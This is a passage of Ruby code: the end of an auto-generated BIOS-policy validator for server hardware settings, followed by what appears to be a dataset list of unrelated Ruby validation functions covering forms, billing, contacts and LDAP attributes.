      return false unless slot_front_nvme6link_speed_validator.valid?(@slot_front_nvme6link_speed)
      slot_front_nvme6option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme6option_rom_validator.valid?(@slot_front_nvme6option_rom)
      slot_front_nvme7link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme7link_speed_validator.valid?(@slot_front_nvme7link_speed)
      slot_front_nvme7option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme7option_rom_validator.valid?(@slot_front_nvme7option_rom)
      slot_front_nvme8link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme8link_speed_validator.valid?(@slot_front_nvme8link_speed)
      slot_front_nvme8option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme8option_rom_validator.valid?(@slot_front_nvme8option_rom)
      slot_front_nvme9link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_front_nvme9link_speed_validator.valid?(@slot_front_nvme9link_speed)
      slot_front_nvme9option_rom_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_front_nvme9option_rom_validator.valid?(@slot_front_nvme9option_rom)
      slot_front_slot5link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_front_slot5link_speed_validator.valid?(@slot_front_slot5link_speed)
      slot_front_slot6link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_front_slot6link_speed_validator.valid?(@slot_front_slot6link_speed)
      slot_gpu1state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_gpu1state_validator.valid?(@slot_gpu1state)
      slot_gpu2state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_gpu2state_validator.valid?(@slot_gpu2state)
      slot_gpu3state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_gpu3state_validator.valid?(@slot_gpu3state)
      slot_gpu4state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_gpu4state_validator.valid?(@slot_gpu4state)
      slot_gpu5state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_gpu5state_validator.valid?(@slot_gpu5state)
      slot_gpu6state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_gpu6state_validator.valid?(@slot_gpu6state)
      slot_gpu7state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_gpu7state_validator.valid?(@slot_gpu7state)
      slot_gpu8state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_gpu8state_validator.valid?(@slot_gpu8state)
      slot_hba_link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_hba_link_speed_validator.valid?(@slot_hba_link_speed)
      slot_hba_state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot_hba_state_validator.valid?(@slot_hba_state)
      slot_lom1link_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_lom1link_validator.valid?(@slot_lom1link)
      slot_lom2link_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_lom2link_validator.valid?(@slot_lom2link)
      slot_mezz_state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot_mezz_state_validator.valid?(@slot_mezz_state)
      slot_mlom_link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_mlom_link_speed_validator.valid?(@slot_mlom_link_speed)
      slot_mlom_state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot_mlom_state_validator.valid?(@slot_mlom_state)
      slot_mraid_link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_mraid_link_speed_validator.valid?(@slot_mraid_link_speed)
      slot_mraid_state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_mraid_state_validator.valid?(@slot_mraid_state)
      slot_n10state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n10state_validator.valid?(@slot_n10state)
      slot_n11state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n11state_validator.valid?(@slot_n11state)
      slot_n12state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n12state_validator.valid?(@slot_n12state)
      slot_n13state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n13state_validator.valid?(@slot_n13state)
      slot_n14state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n14state_validator.valid?(@slot_n14state)
      slot_n15state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n15state_validator.valid?(@slot_n15state)
      slot_n16state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n16state_validator.valid?(@slot_n16state)
      slot_n17state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n17state_validator.valid?(@slot_n17state)
      slot_n18state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n18state_validator.valid?(@slot_n18state)
      slot_n19state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n19state_validator.valid?(@slot_n19state)
      slot_n1state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot_n1state_validator.valid?(@slot_n1state)
      slot_n20state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n20state_validator.valid?(@slot_n20state)
      slot_n21state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n21state_validator.valid?(@slot_n21state)
      slot_n22state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n22state_validator.valid?(@slot_n22state)
      slot_n23state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n23state_validator.valid?(@slot_n23state)
      slot_n24state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n24state_validator.valid?(@slot_n24state)
      slot_n2state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot_n2state_validator.valid?(@slot_n2state)
      slot_n3state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n3state_validator.valid?(@slot_n3state)
      slot_n4state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n4state_validator.valid?(@slot_n4state)
      slot_n5state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n5state_validator.valid?(@slot_n5state)
      slot_n6state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n6state_validator.valid?(@slot_n6state)
      slot_n7state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n7state_validator.valid?(@slot_n7state)
      slot_n8state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n8state_validator.valid?(@slot_n8state)
      slot_n9state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_n9state_validator.valid?(@slot_n9state)
      slot_raid_link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_raid_link_speed_validator.valid?(@slot_raid_link_speed)
      slot_raid_state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_raid_state_validator.valid?(@slot_raid_state)
      slot_rear_nvme1link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_rear_nvme1link_speed_validator.valid?(@slot_rear_nvme1link_speed)
      slot_rear_nvme1state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_rear_nvme1state_validator.valid?(@slot_rear_nvme1state)
      slot_rear_nvme2link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_rear_nvme2link_speed_validator.valid?(@slot_rear_nvme2link_speed)
      slot_rear_nvme2state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_rear_nvme2state_validator.valid?(@slot_rear_nvme2state)
      slot_rear_nvme3link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_rear_nvme3link_speed_validator.valid?(@slot_rear_nvme3link_speed)
      slot_rear_nvme3state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_rear_nvme3state_validator.valid?(@slot_rear_nvme3state)
      slot_rear_nvme4link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3", "GEN4"])
      return false unless slot_rear_nvme4link_speed_validator.valid?(@slot_rear_nvme4link_speed)
      slot_rear_nvme4state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_rear_nvme4state_validator.valid?(@slot_rear_nvme4state)
      slot_rear_nvme5state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_rear_nvme5state_validator.valid?(@slot_rear_nvme5state)
      slot_rear_nvme6state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_rear_nvme6state_validator.valid?(@slot_rear_nvme6state)
      slot_rear_nvme7state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_rear_nvme7state_validator.valid?(@slot_rear_nvme7state)
      slot_rear_nvme8state_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless slot_rear_nvme8state_validator.valid?(@slot_rear_nvme8state)
      slot_riser1link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_riser1link_speed_validator.valid?(@slot_riser1link_speed)
      slot_riser1slot1link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_riser1slot1link_speed_validator.valid?(@slot_riser1slot1link_speed)
      slot_riser1slot2link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_riser1slot2link_speed_validator.valid?(@slot_riser1slot2link_speed)
      slot_riser1slot3link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_riser1slot3link_speed_validator.valid?(@slot_riser1slot3link_speed)
      slot_riser2link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_riser2link_speed_validator.valid?(@slot_riser2link_speed)
      slot_riser2slot4link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_riser2slot4link_speed_validator.valid?(@slot_riser2slot4link_speed)
      slot_riser2slot5link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_riser2slot5link_speed_validator.valid?(@slot_riser2slot5link_speed)
      slot_riser2slot6link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_riser2slot6link_speed_validator.valid?(@slot_riser2slot6link_speed)
      slot_sas_state_validator = EnumAttributeValidator.new('String', ["platform-default", "disabled", "enabled", "Legacy Only", "UEFI Only"])
      return false unless slot_sas_state_validator.valid?(@slot_sas_state)
      slot_ssd_slot1link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_ssd_slot1link_speed_validator.valid?(@slot_ssd_slot1link_speed)
      slot_ssd_slot2link_speed_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Disabled", "GEN1", "GEN2", "GEN3"])
      return false unless slot_ssd_slot2link_speed_validator.valid?(@slot_ssd_slot2link_speed)
      smee_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless smee_validator.valid?(@smee)
      smt_mode_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "Off"])
      return false unless smt_mode_validator.valid?(@smt_mode)
      snc_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "disabled", "enabled"])
      return false unless snc_validator.valid?(@snc)
      snoopy_mode_for2lm_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless snoopy_mode_for2lm_validator.valid?(@snoopy_mode_for2lm)
      snoopy_mode_for_ad_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless snoopy_mode_for_ad_validator.valid?(@snoopy_mode_for_ad)
      sparing_mode_validator = EnumAttributeValidator.new('String', ["platform-default", "dimm-sparing", "rank-sparing"])
      return false unless sparing_mode_validator.valid?(@sparing_mode)
      sr_iov_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless sr_iov_validator.valid?(@sr_iov)
      streamer_prefetch_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless streamer_prefetch_validator.valid?(@streamer_prefetch)
      svm_mode_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless svm_mode_validator.valid?(@svm_mode)
      terminal_type_validator = EnumAttributeValidator.new('String', ["platform-default", "pc-ansi", "vt100", "vt100-plus", "vt-utf8"])
      return false unless terminal_type_validator.valid?(@terminal_type)
      tpm_control_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless tpm_control_validator.valid?(@tpm_control)
      tpm_pending_operation_validator = EnumAttributeValidator.new('String', ["platform-default", "None", "TpmClear"])
      return false unless tpm_pending_operation_validator.valid?(@tpm_pending_operation)
      tpm_support_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless tpm_support_validator.valid?(@tpm_support)
      tsme_validator = EnumAttributeValidator.new('String', ["platform-default", "Auto", "disabled", "enabled"])
      return false unless tsme_validator.valid?(@tsme)
      txt_support_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless txt_support_validator.valid?(@txt_support)
      ucsm_boot_order_rule_validator = EnumAttributeValidator.new('String', ["platform-default", "Loose", "Strict"])
      return false unless ucsm_boot_order_rule_validator.valid?(@ucsm_boot_order_rule)
      ufs_disable_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless ufs_disable_validator.valid?(@ufs_disable)
      uma_based_clustering_validator = EnumAttributeValidator.new('String', ["platform-default", "Disable (All2All)", "Hemisphere (2-clusters)"])
      return false unless uma_based_clustering_validator.valid?(@uma_based_clustering)
      upi_link_enablement_validator = EnumAttributeValidator.new('String', ["platform-default", "1", "2", "Auto"])
      return false unless upi_link_enablement_validator.valid?(@upi_link_enablement)
      upi_power_management_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless upi_power_management_validator.valid?(@upi_power_management)
      usb_emul6064_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless usb_emul6064_validator.valid?(@usb_emul6064)
      usb_port_front_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless usb_port_front_validator.valid?(@usb_port_front)
      usb_port_internal_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless usb_port_internal_validator.valid?(@usb_port_internal)
      usb_port_kvm_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless usb_port_kvm_validator.valid?(@usb_port_kvm)
      usb_port_rear_validator = EnumAttributeValidator.new('String', ["platform-default", "enabled", "disabled"])
      return false unless usb_port_rear_validator.valid?(@usb_port_rear)
      usb_port_sd_card_validator =
EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_port_sd_card_validator.valid?(@usb_port_sd_card)\n usb_port_vmedia_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_port_vmedia_validator.valid?(@usb_port_vmedia)\n usb_xhci_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_xhci_support_validator.valid?(@usb_xhci_support)\n vga_priority_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Offboard\", \"Onboard\", \"Onboard VGA Disabled\"])\n return false unless vga_priority_validator.valid?(@vga_priority)\n virtual_numa_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless virtual_numa_validator.valid?(@virtual_numa)\n vmd_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless vmd_enable_validator.valid?(@vmd_enable)\n vol_memory_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1LM\", \"2LM\"])\n return false unless vol_memory_mode_validator.valid?(@vol_memory_mode)\n work_load_config_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Balanced\", \"I/O Sensitive\", \"NUMA\", \"UMA\"])\n return false unless work_load_config_validator.valid?(@work_load_config)\n xpt_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless xpt_prefetch_validator.valid?(@xpt_prefetch)\n xpt_remote_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless xpt_remote_prefetch_validator.valid?(@xpt_remote_prefetch)\n true && super\n end",
"def valid?\n return false if !@code.nil? && @code.to_s.length > 6\n return false if !@start_date.nil? && @start_date.to_s.length > 10\n return false if !@end_date.nil? && @end_date.to_s.length > 10\n return false if !@condition_reason.nil? && @condition_reason.to_s.length > 6\n return false if !@condition_reason_text.nil? && @condition_reason_text.to_s.length > 1000\n return false if !@condition_to_apply.nil? && @condition_to_apply.to_s.length > 1000\n return false if !@regions.nil? && @regions.to_s.length > 1000\n return false if !@number_or_percentage_home_visit_type.nil? && @number_or_percentage_home_visit_type.to_s.length > 6\n return false if !@number_or_percentage_home_visit.nil? && @number_or_percentage_home_visit.to_s.length > 3\n return false if !@frequency_of_visit.nil? && @frequency_of_visit.to_s.length > 60\n true\n end",
"def is_date_nil\n\t\tif @start_date.blank? && @start_time.blank?\n\t\t\terrors.add(:start_date, \"Please enter a date.\")\n\t\t\terrors.add(:start_time, \"Please enter a time.\")\n\t\tend\n\n\t\tif @start_date.blank? && @start_time.present?\n\t\t\terrors.add(:start_date, \"Please enter a date.\")\n\t\tend\n\n\t\tif @start_time.blank? && @start_date.present?\n\t\t\terrors.add(:start_time, \"Please enter a time.\")\n\t\tend\n\tend",
"def validate_required_fields\n user = new_record? ? author : current_journal.try(:user)\n\n required_attribute_names(user).each do |attribute|\n if /^\\d+$/.match?(attribute)\n attribute = attribute.to_i\n v = custom_field_values.detect {|v| v.custom_field_id == attribute}\n if v && Array(v.value).detect(&:present?).nil?\n errors.add(v.custom_field.name, l('activerecord.errors.messages.blank'))\n end\n else\n if respond_to?(attribute) && send(attribute).blank? && !disabled_core_fields.include?(attribute)\n next if attribute == 'category_id' && project.try(:issue_categories).blank?\n next if attribute == 'fixed_version_id' && assignable_versions.blank?\n\n #####\n # START PATCH\n next if attribute == 'typology_id' && !project.module_enabled?('typologies')\n next if attribute == 'typology_id' && project.typologies.blank?\n # END PATCH\n #####\n\n errors.add attribute, :blank\n end\n end\n end\n end",
"def valid?\n return false if @pricing_component_type.nil?\n pricing_component_type_validator = EnumAttributeValidator.new('String', [\"setup\", \"subscription\", \"arrears\", \"usage\"])\n return false unless pricing_component_type_validator.valid?(@pricing_component_type)\n return false if @charge_type.nil?\n charge_type_validator = EnumAttributeValidator.new('String', [\"Credit\", \"Debit\"])\n return false unless charge_type_validator.valid?(@charge_type)\n return false if @period_start.nil?\n return false if @period_end.nil?\n return false if @invoice_id.nil?\n return false if @organization_id.nil?\n return false if @name.nil?\n return false if @description.nil?\n return false if @calculation.nil?\n return false if @cost.nil?\n return false if @tax.nil?\n return false if @component_value.nil?\n return false if @pricing_component_id.nil?\n return false if @public_pricing_component_name.nil?\n return false if @pricing_component_name.nil?\n return false if @subscription_charge_id.nil?\n return false if @child_invoice_id.nil?\n return false if @type.nil?\n type_validator = EnumAttributeValidator.new('String', [\"PricingComponent\", \"Coupon\", \"Migration\", \"AggregatedInvoice\"])\n return false unless type_validator.valid?(@type)\n return true\n end",
"def valid_record?( record )\n !record[:name].nil? and !record[:type].nil? and !record[:value].nil? and\n !record[:name].empty? and !record[:type].empty? and !record[:value].empty?\nend",
"def prepare_myabsence\n unless params[:date].blank? || params[:date] == \"undefined\"\n @date = Date.parse(params[:date])\n else\n @date = Date.today\n end\n yesterday_presence = @current_person.presences.find_by_presence_date(@date.yesterday)\n my_last_presence = @current_person.presences.find(:first, :order => \"presence_date DESC\")\n if my_last_presence\n @my_last_presence_date = my_last_presence.presence_date\n else\n @my_last_presence_date = Date.yesterday\n end\n @my_presence = @current_person.presences.find_by_presence_date(@date)\n @yesterday_schedule = @current_person.current_schedule(Date.yesterday).blank? ? Date.yesterday.to_time : @current_person.current_schedule(Date.yesterday)[:schedule_end]\n if @my_presence\n @my_presence_details = @my_presence.presence_details(:order => :start_working)\n end\n end",
"def workUnitsAttributesAnalysis(entities,tr_uuid,wu_key)\n\t\t@wu_attr_result={:uuid => tr_uuid, :wukey => wu_key, :attrs => [], :success_count => 0, :failed_count => 0 }\n\t\tparams=prepare_base_params()\t\n\t\t@workunitattr_restapi=\"#{@optier_base_url}/eTransactionInstance/#{tr_uuid}/wu/#{wu_key}?tf=#{@time_frame}&#{@order_filters}\"\t\t\n\t\tresult=server_rest_api(@workunitattr_restapi,params)\t\t\n\t\n\n\t\t@found_attr=false\t\n\t\tentities.each do |entity|\t\t\t\t\t\t\t\n\t\t\tattrtype={:attrType => entity[:attrType], :attrs => [],:status => nil, :success_count => 0, :failed_count => 0}\t\t\t\t\n\t\t\tattributes=[]\t\t\t\n\t\t\tresult[:attributes].each do |res|\t\t\t\t\t\t\n\t\t\t\t@found_attr=false\t\t\t\t\t\n\t\t\t\tif ! res[0][entity[:attrType]].nil?\n\t\t\t\t\tentity[:attrs].each do |k,v|\n \t\t\t\tif ( ( res[1].has_key?(k)) && (( v == \"key_only\") || (res[1][k].eql?(v) ) )) \t\t\t\n\t\t\t\t\t\t\tattrtype[:status]=true\n\t\t\t\t\t\t\tattrtype[:success_count]+=1\t\t\t\t\t\t\n\t\t\t\t\t\t\t@found_attr=true\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tactual=(v.eql?(\"key_only\")) ? \"found\" : res[1][k]\t\t\t\t\t\t\t\t\n\t\t\t\t\t\telse\t\t\t\n\t\t\t\t\t\t\t@found_attr=false\t\t\t\t\t\t\n\t\t\t\t\t\t\tattrtype[:failed_count]+=1\n\t\t\t\t\t\t\tattrtype[:status]=false\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tactual=(v.eql?(\"key_only\")) ? \"not_found\" : res[1][k]\t\t\t\t\t\t\t\n\t\t\t\t\t\tend\t\t\t\t\n\t\t\t\t\t\tattrtype[:attrs].push({:param=> k, :expected_value=> v, :actual_value=> actual})\t\t\t\t\t\t\n\t\t\t\t\tend\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t@wu_attr_result[:attrs].push(attrtype)\n\t\t\t\tend\n\t\t\tend unless result[:attributes].nil?\n\t\t\t@wu_attr_result[:status]=attrtype[:status]\n\t\t\t@wu_attr_result[:success_count]+=attrtype[:success_count]\n\t\t\t@wu_attr_result[:failed_count]+=attrtype[:failed_count]\n\t\t\tbreak if @found_attr\t\n\t\tend\n\t\treturn @wu_attr_result\n\tend",
"def valid_attributes\n %w[\n amount\n authorisationId\n automaticResponseUrl\n captureDay\n captureMode\n complementaryCode\n complementaryInfo\n currencyCode\n customerLanguage\n expirationdate\n keyVersion\n maskedPan\n merchantId\n normalReturnUrl\n orderId\n paymentMeanBrand\n paymentMeanBrandList\n paymentMeanType\n responseCode\n transactionDateTime\n transactionReference\n ]\n end",
"def details_complete?\n name.valid? &&\n date_of_birth.present? &&\n date_of_applicability.present? &&\n addresses.any?(&:valid?)\n end",
"def fully_specified\r\n !address.nil? && !address.empty? &&\r\n !city.nil? && !city.empty? &&\r\n !state.nil? && !state.empty? &&\r\n !zip.nil? && !zip.empty?\r\n end",
"def valid?\n return false if @first_name.nil?\n return false if @first_name.to_s.length > 30\n return false if !@last_name.nil? && @last_name.to_s.length > 30\n return false if !@address_line1.nil? && @address_line1.to_s.length > 50\n return false if !@address_line2.nil? && @address_line2.to_s.length > 50\n return false if !@city.nil? && @city.to_s.length > 50\n return false if !@state.nil? && @state.to_s.length > 50\n return false if !@zip.nil? && @zip.to_s.length > 12\n return false if !@country.nil? && @country.to_s.length > 50\n return false if !@security_identifier.nil? && @security_identifier.to_s.length > 184\n return false if !@title.nil? && @title.to_s.length > 100\n return false if !@school.nil? && @school.to_s.length > 50\n return false if !@nick_name.nil? && @nick_name.to_s.length > 30\n return false if !@significant_other.nil? && @significant_other.to_s.length > 30\n return false if !@portal_password.nil? && @portal_password.to_s.length > 15\n return false if !@portal_security_level.nil? && @portal_security_level > 6.0\n return false if !@portal_security_level.nil? && @portal_security_level < 1.0\n gender_validator = EnumAttributeValidator.new('String', [\"Male\", \"Female\"])\n return false unless gender_validator.valid?(@gender)\n presence_validator = EnumAttributeValidator.new('String', [\"Online\", \"DoNotDisturb\", \"Away\", \"Offline\", \"NoAgent\"])\n return false unless presence_validator.valid?(@presence)\n return true\n end",
"def set_default_values\n self.is_paid = false\n self.is_served = false\n self.is_preparation_started = false\n self.is_preparation_done = false\n return true\n end",
"def compute_criteria_to_check\n if params[:hour]\n hours = [params[:hour]]\n require_all = true\n else\n hours = (0...24).to_a\n require_all = channel.update_frequency == DataProviderChannel::UPDATES_HOURLY\n end\n options_list = hours.map do |hour|\n prefix = basename_prefix(\n :channel_name => channel.name,\n :date => params[:date], :hour => hour\n )\n {:date => params[:date], :hour => hour, :prefix => prefix}\n end\n [options_list, require_all]\n end",
"def assumption_params\n attribute_for_all = [:name, :description, :type,]\n array_for_all = {required_by_ids: [], model_ids: []}\n res = if (params[:query_assumption])\n params.require(:query_assumption).permit(attribute_for_all, :question, :argument_inverted, array_for_all)\n elsif (params[:blank_assumption])\n params.require(:blank_assumption).permit(attribute_for_all, :argument_inverted, array_for_all, assumption_ids: [])\n elsif (params[:test_assumption])\n params.require(:test_assumption).permit(attribute_for_all, :r_code, :argument_inverted, array_for_all, required_dataset_fields: [])\n elsif (params[:query_test_assumption])\n params.require(:query_test_assumption).permit(attribute_for_all, :r_code, :argument_inverted, :question, :argument_inverted, array_for_all, required_dataset_fields: [])\n else\n {}\n end\n res[:user] = current_user\n res\n end",
"def custom_validations\n self.validate_baseline && validate_baseline_date && \n self.validate_trial_days && self.validates_goal_name && self.validation_due_date\n end",
"def attributes_exist?\n\tend",
"def get_mandatory\n @mandatory\n end",
"def validate_params\n validate_size\n validate_mine_density\n validate_first_click\n type_specific_checks\n end",
"def validate_required_values\n # Make sure all MUST attributes have a value\n @object_classes.each do |object_class|\n object_class.must.each do |required_attribute|\n # Normalize to ensure we catch schema problems\n # needed?\n real_name = to_real_attribute_name(required_attribute.name, true)\n raise UnknownAttribute.new(required_attribute) if real_name.nil?\n # # Set default if it wasn't yet set.\n # @data[real_name] ||= [] # need?\n value = @data[real_name] || []\n # Check for missing requirements.\n if value.empty?\n _schema = schema\n aliases = required_attribute.aliases.collect do |name|\n self.class.human_attribute_name(name)\n end\n args = [self.class.human_object_class_name(object_class)]\n if ActiveLdap.const_defined?(:GetTextFallback)\n if aliases.empty?\n format = \"is required attribute by objectClass '%s'\"\n else\n format = \"is required attribute by objectClass '%s'\" \\\n \": aliases: %s\"\n args << aliases.join(', ')\n end\n else\n if aliases.empty?\n format = _(\"%{fn} is required attribute by objectClass '%s'\")\n else\n format = _(\"%{fn} is required attribute by objectClass \" \\\n \"'%s': aliases: %s\")\n 